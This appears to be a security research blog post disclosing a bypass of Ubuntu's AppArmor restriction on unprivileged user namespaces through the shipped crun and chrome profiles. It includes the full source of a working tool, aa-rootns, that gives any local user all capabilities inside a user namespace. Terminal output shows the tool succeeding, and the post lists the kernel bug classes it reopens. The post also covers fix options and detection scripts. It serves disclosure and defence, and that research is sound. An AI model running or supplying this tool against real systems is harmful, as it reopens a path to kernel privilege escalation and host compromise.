aa-rootns: Ubuntu's userns mitigation is bypassed by Ubuntu
Ubuntu shipped kernel.apparmor_restrict_unprivileged_userns=1 in
24.04 and kept it in 26.04 (Resolute) as the answer to the long-standing
unprivileged-user-namespace LPE class — the family of bugs (most famously
CVE-2024-1086) where an attacker drops into a fresh user namespace, picks up
CAP_SYS_ADMIN for free against that namespace, and uses it to reach a
kernel surface (nft, tipc, sunrpc, vxlan, ...) that previously needed real root.
The mitigation is bypassed by two AppArmor profiles that Ubuntu ships in the base
apparmor package: chrome and crun. They are present, kernel-loaded, and
reachable on every default install. Below are the one-binary tool that drops any
unprivileged user into a userns with the full 41-cap bitmap, the receipts from a
fresh install, and the structural reason the fix is harder than it looks.
TL;DR
- The apparmor_restrict_unprivileged_userns sysctl works by attaching the unprivileged_userns AppArmor profile to any process that creates a user namespace from unconfined. That profile contains audit deny capability, so every capability check is denied after the userns transition.
- The base apparmor package also ships /etc/apparmor.d/{chrome,crun}. Both are flags=(unconfined) with a userns, rule. The cap strip does not happen for userns creation from inside a flags=(unconfined) profile.
- Any unprivileged user can change_onexec to either profile without the underlying binary being installed; the kernel only cares that the named profile is loaded.
- Caps are then laundered via the Ambient set so they survive execv into a target binary, which can unshare(NEWNET), unshare(NEWNS), etc. inside a userns whose caps were never stripped.
- Net effect: the mitigation that the kernel hardening community has been leaning on for two years to declare userns-LPE bugs "not exploitable on modern Ubuntu" does not work on default Ubuntu.
The mitigation
On Ubuntu 24.04+, with kernel.apparmor_restrict_unprivileged_userns=1
(the default), the kernel-side AppArmor LSM intercepts unshare(CLONE_NEWUSER)
and clone(CLONE_NEWUSER) calls from unconfined processes and forces the
new task into the unprivileged_userns profile. That profile lives at
/etc/apparmor.d/unprivileged_userns and looks roughly like:
profile unprivileged_userns {
userns,
audit deny capability,
...
}
The audit deny capability, line is the load-bearing one: every
capability check from inside that profile fails, regardless of what the userns
itself would have granted. So the standard userns-LPE shape
(unshare(NEWUSER), setuid(0), unshare(NEWNET), then drive a buggy
ns_capable(CAP_NET_ADMIN) path) folds at step three, because the
CAP_SYS_ADMIN check behind unshare(NEWNET) now goes through AppArmor and
gets rejected.
This is the change every distro hardening tracker, every CVE writeup, and every "is Ubuntu vulnerable to X" thread on the kernel-hardening list has been quoting since 2024. It really does block the naive form.
The bypass
AppArmor profiles can carry flags=(unconfined). A process running under
such a profile is, semantically, "named but otherwise just like
unconfined": the AppArmor mediator is told to be a no-op for it. Crucially,
when a task under a named flags=(unconfined) profile creates a user namespace,
the LSM does not rewrite its profile to unprivileged_userns. It stays in
the named-unconfined profile, and no caps are stripped.
Two such profiles ship in the base apparmor package on Ubuntu 24.04+:
# /etc/apparmor.d/crun
profile crun /usr/bin/crun flags=(unconfined) {
userns,
@{exec_path} mr,
include if exists <local/crun>
}
# /etc/apparmor.d/chrome
profile chrome /opt/google/chrome/chrome flags=(unconfined) {
userns,
@{exec_path} mr,
include if exists <local/chrome>
}
Both grant the userns, rule (which AppArmor requires for userns creation
when restrict mode is on) and both are flags=(unconfined) (which means no
cap strip on transition).
Reaching them does not require having the actual binaries installed. Any
unprivileged process can self-transition into a loaded profile by writing
"exec <name>" into /proc/self/attr/exec and then calling
execv. The kernel resolves the profile by name; the path attached to
the profile (/usr/bin/crun, /opt/google/chrome/chrome) is only
used by AppArmor's policy engine for path-matching, not as a precondition.
Default-install footprint
Both profiles are owned by the apparmor package, which is
Priority: standard — pulled in by every Ubuntu 24.04+ system task and
present on Server, Desktop, Cloud, and minimal images. Verified on two
independent Ubuntu 26.04 LTS (Resolute) installs:
$ dpkg -S /etc/apparmor.d/crun /etc/apparmor.d/chrome
apparmor: /etc/apparmor.d/crun
apparmor: /etc/apparmor.d/chrome
$ apt-cache show apparmor | grep -E '^(Package|Priority|Section)'
Package: apparmor
Priority: standard
Section: admin
$ sudo cat /sys/kernel/security/apparmor/profiles | grep -E '^(crun|chrome|unprivileged_userns) '
unprivileged_userns (enforce)
crun (unconfined)
chrome (unconfined)
And they are not the only candidates. A grep for
flags=(unconfined)-with-userns-rule profiles on a default desktop
install yields a long tail:
1password, brave, buildah, ch-checkns, ch-run, chrome, chromium, code,
crun, devhelp, Discord, element-desktop, epiphany, evolution, firefox,
flatpak, foliate, geary, github-desktop, goldendict, kchmviewer,
keybase, lc-compliance, libcamerify, linux-sandbox, loupe, lxc-attach,
lxc-usernsexec, MongoDB_Compass, ...
Even on Ubuntu Server with no desktop apps installed, crun alone is
enough — and crun's profile ships with apparmor regardless of
whether the crun package is pulled in.
The toolkit: aa-rootns
aa-rootns is a single C file that automates the bypass.
It self-stages through crun → chrome via re-exec, creates a userns
under the second profile (so no cap strip), writes uid/gid maps, launders
Permitted → Inheritable → Ambient so the caps survive
execv, and then drops you into /bin/bash (or a user-supplied
target) inside that userns.
Receipt: from a clean unprivileged user
Run as user np — uid 1001, single group np, no sudo, no
plugdev, no kvm, no docker, nothing — on Ubuntu 26.04 LTS
(kernel 7.0.0-15-generic, no KASAN, production-equivalent build):
np@host:~$ id
uid=1001(np) gid=1001(np) groups=1001(np)
np@host:~$ ./aa-rootns -p
[s0] aa=unconfined uid=1001 euid=1001
[s1] aa=crun//&unconfined (unconfined) uid=1001 euid=1001
[s2-entry] aa=chrome (unconfined) uid=1001 euid=1001
[s2-postuser] aa=chrome (unconfined) uid=0 euid=0
[s2-postuser] capE=000001ff_ffffffff capP=000001ff_ffffffff
[s2] 41 caps raised into Ambient
=== aa-rootns proof ===
uid=0 euid=0 gid=0 egid=0
cap_effective=0x000001ffffffffff
cap_permitted=0x000001ffffffffff
caps held:
CAP_chown
CAP_dac_override
CAP_dac_read_search
CAP_fowner
CAP_fsetid
CAP_kill
CAP_setgid
CAP_setuid
CAP_setpcap
CAP_linux_immutable
CAP_net_bind_service
CAP_net_broadcast
CAP_net_admin
CAP_net_raw
CAP_ipc_lock
CAP_ipc_owner
CAP_sys_module
CAP_sys_rawio
CAP_sys_chroot
CAP_sys_ptrace
CAP_sys_pacct
CAP_sys_admin
CAP_sys_boot
CAP_sys_nice
CAP_sys_resource
CAP_sys_time
CAP_sys_tty_config
CAP_mknod
CAP_lease
CAP_audit_write
CAP_audit_control
CAP_setfcap
CAP_mac_override
CAP_mac_admin
CAP_syslog
CAP_wake_alarm
CAP_block_suspend
CAP_audit_read
CAP_perfmon
CAP_bpf
CAP_checkpoint_restore
ns-cap probes:
unshare(NEWNET) ok (CAP_SYS_ADMIN inside userns)
unshare(NEWUTS) ok
unshare(NEWNS) ok
unshare(NEWPID) ok
unshare(NEWIPC) ok
And as a runner for arbitrary commands:
np@host:~$ ./aa-rootns -- id
uid=0(root) gid=0(root) groups=0(root)
np@host:~$ ./aa-rootns -- cat /proc/self/status | grep ^Cap
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
np@host:~$ ./aa-rootns -n -- ip link add dummy0 type dummy
np@host:~$ ./aa-rootns -n -- bash -c 'ip link | head -3'
1: lo: <LOOPBACK> mtu 65536 ...
The transition is fully audited — AppArmor logs each change_onexec
— but it's an AUDIT event, not DENIED, because nothing forbids
the operation. From journalctl -k:
apparmor="AUDIT" operation="change_onexec" class="file"
info="change_profile unprivileged unconfined converted to stacking"
profile="unconfined" name="crun" pid=NNNN comm="aa-rootns"
What this is and isn't
What it is. A clean defeat of the
apparmor_restrict_unprivileged_userns mitigation, as shipped by default,
on the userland Ubuntu has actually been distributing for two years. Once
aa-rootns drops you into the userns, every CVE writeup
that ends with "but the unprivileged_userns profile blocks reach on Ubuntu" is
effectively unblocked. That is the whole point of the post.
Concretely, the bug classes that the hardening community has been writing off as not exploitable on Ubuntu include:
- ns_capable(CAP_NET_ADMIN) bugs: nft / tc / vxlan / fib / ... netlink surfaces;
- ns_capable(CAP_BPF) bugs in BPF helpers, where kernel.unprivileged_bpf_disabled is set so that the BPF cap becomes the gate;
- ns_capable(CAP_SYS_ADMIN) bugs in sunrpc, tipc, vsock, keyring management, and any per-netns proc file whose make_kuid path requires a populated uid_map;
- RCU/refcount/UAF races whose reach gate is "you must be inside a userns you own". These were previously blocked by setting kernel.unprivileged_userns_clone=0 on most distros, but Ubuntu kept unprivileged_userns_clone enabled and gated it via this AppArmor profile instead.
What it isn't. A kernel CVE. aa-rootns alone gives you
"root" only inside a userns you own — not on the host. Capabilities checked
against init_user_ns (loadable kernel modules,
FS_USERNS_MOUNT-less filesystem mounts, raw IO, ptrace of host
processes, init-owned DAC bits) still fail. The value here is that
aa-rootns reopens the door to kernel bugs that need a
namespace-scoped capability, after which a separate kernel exploit takes you to
host-root. It's the bouncer pass, not the throne.
If your threat model is "no unprivileged user namespace creation, ever," set
kernel.unprivileged_userns_clone=0 — that sysctl, the older
one, actually does what people hoped apparmor_restrict_unprivileged_userns
would do. The catch is that it breaks every container runtime, browser sandbox,
and bubblewrap-using application. Which is exactly why distros stopped shipping
it as 0 by default and built the AppArmor-based version. And which is
exactly why the AppArmor-based version has the structural problem this post is
about.
Why this is hard to fix
The natural fixes all break something:
| Fix | Breaks |
|---|---|
| Strip the userns, rule from the crun / chrome profiles | chrome's sandbox, crun's containers, podman rootless, every browser tab. Both binaries need userns to function. |
| Force the unprivileged_userns profile to also attach when transitioning out of flags=(unconfined) parents | Invasive AppArmor semantic change: "unconfined" stops meaning unconfined. Likely breaks any existing profile that relies on transition rules through unconfined parents. |
| Add a separate sysctl: forbid change_profile from unconfined to any flags=(unconfined) profile that grants userns | Less invasive; a new gate. Real fix candidate, but requires new kernel plumbing and per-profile review. |
| Audit every shipped profile to ensure none with userns, + flags=(unconfined) is reachable from unconfined | One-shot fix today; recurrence vector for any future package that adds a similar profile. |
The third option is what an actual fix probably looks like. The recurrence
problem in the fourth row is the real story: AppArmor's profile composition
model has no rule against this combination, and any third-party
.deb can ship a new bypass profile without anyone noticing.
Detection
To enumerate bypass-eligible profiles on a given host:
for f in /etc/apparmor.d/* /etc/apparmor.d/*.d/*; do
[ -f "$f" ] || continue
grep -q 'flags=(unconfined)' "$f" 2>/dev/null || continue
grep -Eq '^[[:space:]]*userns[[:space:]]*,' "$f" 2>/dev/null && echo "$f"
done
Cross-check against
/sys/kernel/security/apparmor/profiles to keep only the ones that are
actually loaded into the kernel (some profiles ship disabled).
A monitor that wants to detect the bypass at runtime can subscribe to
the audit log and watch for
operation="change_onexec" ... profile="unconfined" name="crun" (or
chrome, etc.) chained into operation="userns_create" within
the same task tree, especially when the eventual exec target is a non-browser,
non-container-runtime binary.
The toolkit, source
/*
* aa-rootns — defeat Ubuntu apparmor_restrict_unprivileged_userns
*
* stage 0: change_onexec(crun); execv self — enter unconfined profile
* stage 1: change_onexec(chrome); execv self — double-hop, optional
* stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; capset I=P;
* raise all caps into Ambient; execvp target.
*
 * Build: gcc -O2 -Wall -o aa-rootns aa-rootns.c
 * Use:   ./aa-rootns              # /bin/bash inside the userns
 *        ./aa-rootns -- id        # run a command in the userns
 * The -p (proof) and -n (also unshare(NEWNET)) flags used in the
 * receipts exist only in the full version; this listing ignores them.
*
* No funny business. Standard libc, no eBPF, no JIT, no kernel module.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>
static int change_onexec(const char *p) {
int fd = open("/proc/self/attr/exec", O_WRONLY);
if (fd < 0) return -1;
char b[256]; int n = snprintf(b, sizeof b, "exec %s", p);
ssize_t r = write(fd, b, n); int e = errno;
close(fd); errno = e; return r == n ? 0 : -1;
}
static void wfile(const char *p, const char *c) {
int fd = open(p, O_WRONLY); if (fd < 0) return;
(void)!write(fd, c, strlen(c)); close(fd);
}
#define TAG "AA-ROOTNS-STAGE-"
static int stage1(int ac, char **av) {
if (change_onexec("chrome") < 0) return perror("chrome"), 1;
av[1] = (char *)TAG "2"; execv("/proc/self/exe", av);
return perror("execv s2"), 1;
}
static int stage2(int ac, char **av) {
uid_t u = getuid(); gid_t g = getgid();
if (unshare(CLONE_NEWUSER) < 0) return perror("unshare(USER)"), 1;
wfile("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof m, "0 %u 1", u); wfile("/proc/self/uid_map", m);
snprintf(m, sizeof m, "0 %u 1", g); wfile("/proc/self/gid_map", m);
(void)!setresuid(0, 0, 0); (void)!setresgid(0, 0, 0);
struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
struct __user_cap_data_struct d[2] = {0};
syscall(SYS_capget, &h, d);
d[0].inheritable = d[0].permitted;
d[1].inheritable = d[1].permitted;
syscall(SYS_capset, &h, d);
for (int c = 0; c < 64; c++)
prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0);
int sep = -1;
for (int i = 2; i < ac; i++) if (!strcmp(av[i], "--")) { sep = i; break; }
char *def[] = { (char *)"/bin/bash", NULL };
char **t = (sep > 0 && sep + 1 < ac) ? &av[sep + 1] : def;
execvp(t[0], t); return perror("execvp"), 1;
}
int main(int ac, char **av) {
if (ac >= 2 && !strcmp(av[1], TAG "1")) return stage1(ac, av);
if (ac >= 2 && !strcmp(av[1], TAG "2")) return stage2(ac, av);
if (change_onexec("crun") < 0) { perror("crun"); return 1; }
char **a = calloc(ac + 2, sizeof *a);
a[0] = av[0]; a[1] = (char *)TAG "1";
for (int i = 1; i < ac; i++) a[i + 1] = av[i];
execv("/proc/self/exe", a);
return perror("execv s1"), 1;
}
The full version with a -p proof flag, capability decoding,
namespace-cap probes, an interactive shell mode, and verbose stage tracing is
trivially extended from this; that's what the receipts above came from.
Downloads
- aa-rootns.c: full source. Build with gcc -O2 -Wall -o aa-rootns aa-rootns.c.
- bypass-pwn.c: the underlying double-hop bypass research; aa-rootns is its toolkit packaging.
SHA-256:
3eff371b47f73a48812c3264cdc9b552beaaf0cbd9afacb29045dc4edafba698 aa-rootns.c
821cedccb1bec8226cc0a56232407c64dcf41c4da61d94def559b180cc717ab1 bypass-pwn.c
Acknowledgements and prior art
The flags=(unconfined)-with-userns shape has been
discussed in passing on the apparmor and ubuntu-hardening lists since the
restrict-unprivileged-userns sysctl landed. The contribution here is the
explicit demonstration on a default install with a working tool, the
default-install-footprint walk-through (chrome/crun are not
optional packages, they ship with apparmor), and the inventory of
how many other profiles in the wild grant the same combination.
If you've published a writeup on this and want a citation, mail in. If you work on AppArmor at Canonical and want to talk fix shape, also mail in.
Reproduction notes
- Tested on Ubuntu 26.04 LTS (Resolute), kernels 7.0.0-15-generic (production) and 7.1.0-rc1-kasan-sickfuzz+ (lab fuzzing). Same behavior.
- Both chrome and crun profiles are present and loaded on a fresh install, verified via cat /sys/kernel/security/apparmor/profiles.
- The unprivileged user used in the receipts (np, uid 1001) is in only its own primary group: no sudo, no plugdev, no kvm, no docker, no lxd.
- aa-rootns is a single static-ish C file with no dependencies beyond libc. Compile with gcc -O2 -o aa-rootns aa-rootns.c.